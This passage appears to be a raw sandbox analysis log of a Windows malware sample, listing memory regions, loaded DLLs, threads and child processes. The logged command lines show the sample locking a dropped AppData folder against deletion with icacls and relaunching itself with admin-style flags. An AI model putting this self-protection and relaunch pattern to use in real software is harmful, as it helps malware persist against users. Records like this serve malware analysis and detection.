Region: id = 777 start_va = 0x7fefef50000 end_va = 0x7fefefe8fff monitored = 0 entry_point = 0x7fefef51c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 778 start_va = 0x7fefeff0000 end_va = 0x7fefeff7fff monitored = 0 entry_point = 0x7fefeff1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 779 start_va = 0x7feff000000 end_va = 0x7feff02dfff monitored = 0 entry_point = 0x7feff001010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 780 start_va = 0x7feff040000 end_va = 0x7feff040fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 781 start_va = 0x7fffff58000 end_va = 0x7fffff59fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 782 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 783 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 784 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 785 start_va = 0x7fffff60000 end_va = 0x7fffff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 786 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 787 start_va = 0x7fffff64000 end_va = 0x7fffff65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 788 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 789 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 790 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 791 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 792 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 793 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 794 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 795 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 796 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 797 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 798 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 799 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 800 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 801 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 802 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 803 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 804 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 805 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 806 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 807 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 808 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 809 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 810 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 811 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 812 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 813 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 814 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 815 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 816 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 817 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 818 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 819 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 820 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 821 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 822 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 823 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 824 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 825 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 826 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 827 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 828 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 829 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 830 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 831 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 832 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1385 start_va = 0x1370000 end_va = 0x137ffff monitored = 0 entry_point = 0x1373e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1386 start_va = 0x1380000 end_va = 0x1383fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 1387 start_va = 0x7fefad60000 end_va = 0x7fefad9efff monitored = 0 entry_point = 0x7fefad612c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1566 start_va = 0x7fef84b0000 end_va = 0x7fef8683fff monitored = 0 entry_point = 0x7fef84e6b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 1567 start_va = 0x5c00000 end_va = 0x5deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 1568 start_va = 0x5c00000 end_va = 0x5d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 1569 start_va = 0x5d70000 end_va = 0x5deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d70000" filename = "" Region: id = 1570 start_va = 0x5df0000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005df0000" filename = "" Region: id = 1571 start_va = 0x5f00000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 1572 start_va = 0x1370000 end_va = 0x1370fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 1573 start_va = 0x1380000 end_va = 0x139ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 1574 start_va = 0x7fef87e0000 end_va = 0x7fef885bfff monitored = 0 entry_point = 0x7fef87e11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1575 start_va = 0x6300000 end_va = 0x653ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 1576 start_va = 0x13a0000 end_va = 0x13a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 1577 start_va = 0x16c0000 end_va = 0x173ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 1578 start_va = 0x2c00000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 1579 start_va = 0x3690000 end_va = 0x370ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1580 start_va = 0x38f0000 end_va = 0x396ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038f0000" filename = "" Region: id = 1581 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 1582 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 1583 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1584 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1585 start_va = 0x2020000 end_va = 0x20c9fff monitored = 0 entry_point = 0x2024104 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1586 start_va = 0x13b0000 end_va = 0x13bcfff monitored = 0 entry_point = 0x13ba138 region_type = mapped_file name = "wuauclt.exe" filename = "\\Windows\\System32\\wuauclt.exe" (normalized: "c:\\windows\\system32\\wuauclt.exe") Region: id = 1587 start_va = 0x6540000 end_va = 0x678efff monitored = 0 entry_point = 0x654236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1588 start_va = 0xfd0000 end_va = 0xfd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 1589 start_va = 0xfc0000 end_va = 0xfc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 1590 start_va = 0xfc0000 end_va = 0xfc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Thread: id = 9 os_tid = 0xe40 Thread: id = 10 os_tid = 0xe3c Thread: id = 11 os_tid = 0xd78 Thread: id = 12 os_tid = 0xd60 Thread: id = 13 os_tid = 0xd18 Thread: id = 14 os_tid = 0xd14 Thread: id = 15 os_tid = 0xcec Thread: id = 16 os_tid = 0xcc4 Thread: id = 17 os_tid = 0x890 Thread: id = 18 os_tid = 0x858 Thread: id = 19 os_tid = 0x528 Thread: id = 20 os_tid = 0x38c Thread: id = 21 os_tid = 0x650 Thread: id = 22 os_tid = 0x67c Thread: id = 23 os_tid = 0x7cc Thread: id = 24 os_tid = 0x6f8 Thread: id = 25 os_tid = 0x480 Thread: id = 26 os_tid = 0x354 Thread: id = 27 os_tid = 0x4cc Thread: id = 28 os_tid = 0x574 Thread: id = 29 os_tid = 0x5c4 Thread: id = 30 os_tid = 0x588 Thread: id = 31 os_tid = 0x7f4 Thread: id = 32 os_tid = 0x74c Thread: id = 33 os_tid = 0x418 Thread: id = 34 os_tid = 0x2b0 Thread: id = 35 os_tid = 0x6cc Thread: id = 36 os_tid = 0x6c4 Thread: id = 37 os_tid = 0x668 Thread: id = 38 os_tid = 0x63c Thread: id = 39 os_tid = 0x610 Thread: id = 40 os_tid = 0x604 Thread: id = 41 os_tid = 0x600 Thread: id = 42 os_tid = 0x5e8 Thread: id = 43 os_tid = 0x5dc Thread: id = 44 os_tid = 0x5cc Thread: id = 45 os_tid = 0x444 Thread: id = 46 os_tid = 0x440 Thread: id = 47 os_tid = 0x434 Thread: id = 48 os_tid = 0x42c Thread: id = 49 os_tid = 0x420 Thread: id = 50 os_tid = 0x214 Thread: id = 51 os_tid = 0x22c Thread: id = 52 os_tid = 0x3f4 Thread: id = 53 os_tid = 0x3ec Thread: id = 54 os_tid = 0x3e0 Thread: id = 55 os_tid = 0x384 Thread: id = 56 os_tid = 0x37c Thread: id = 57 os_tid = 0x374 Thread: id = 58 os_tid = 0x36c Thread: id = 98 os_tid = 0xff4 Thread: id = 99 os_tid = 0xff8 Thread: id = 100 os_tid = 0xffc Thread: id = 101 os_tid = 0xafc Thread: id = 102 os_tid = 0xb08 Thread: id = 103 os_tid = 0xb10 Thread: id = 105 os_tid = 0xb8 Process: id = "4" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x43a7c000" os_pid = "0xec8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xea0" cmd_line = "icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 836 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 837 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 838 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 839 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 840 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 841 start_va = 0x130000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 842 start_va = 0x1e0000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 843 start_va = 0x8d0000 end_va = 0x8d9fff monitored = 0 entry_point = 0x8d5489 region_type = mapped_file name = "icacls.exe" filename = "\\Windows\\SysWOW64\\icacls.exe" (normalized: "c:\\windows\\syswow64\\icacls.exe") Region: id = 844 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 845 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 846 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 847 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 848 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 849 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 850 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 851 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 852 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 853 start_va = 0x220000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 854 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 855 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 856 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 857 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 858 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 859 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 860 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 861 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 862 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 863 start_va = 0x430000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 864 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 865 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 866 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 867 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 868 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 869 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 870 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 871 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 872 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 873 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 874 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 875 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 876 start_va = 0x220000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 877 start_va = 0x3b0000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 878 start_va = 0x2a0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 879 start_va = 0x320000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 880 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 881 start_va = 0x748a0000 end_va = 0x748c0fff monitored = 0 entry_point = 0x748a145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 882 start_va = 0x75b90000 end_va = 0x75bd4fff monitored = 0 entry_point = 0x75b911e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 883 start_va = 0x20000 end_va = 0x25fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "icacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ICacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\icacls.exe.mui") Thread: id = 59 os_tid = 0xecc Thread: id = 60 os_tid = 0xed0 Process: id = "5" image_name = "0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" filename = "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" page_root = "0x43004000" os_pid = "0xed8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xea0" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 919 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 920 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 921 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 922 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 923 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 924 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 925 start_va = 0x400000 end_va = 0x253dfff monitored = 1 entry_point = 0x4984b0 region_type = mapped_file name = "0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" filename = 